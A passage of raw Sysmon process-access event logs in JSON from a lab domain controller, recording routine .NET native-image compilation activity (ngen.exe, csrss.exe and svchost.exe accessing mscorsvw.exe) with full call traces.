560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.308\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010F3C20E00}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.308","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010F3C20E00}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.308\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010F3C20E00}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.308","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010F3C20E00}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010F3C20E00}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010F3C20E00}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.355\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8C60E00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.355","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8C60E00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.355\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8C60E00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.355","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8C60E00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010C8C60E00}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010C8C60E00}","TargetProcessId":"4784","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.386\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00100ECA0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.386","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00100ECA0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.386\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 